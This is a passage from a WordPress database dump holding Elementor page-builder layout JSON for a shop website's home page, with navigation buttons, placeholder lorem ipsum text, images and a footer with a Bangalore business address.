"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8313,1462,'_elementor_page_assets','a:0:{}'),(8315,1463,'_elementor_edit_mode','builder'),(8316,1463,'_elementor_template_type','wp-page'),(8317,1463,'_elementor_version','3.7.7'),(8318,1463,'_wp_page_template','elementor_canvas'),(8319,1463,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: 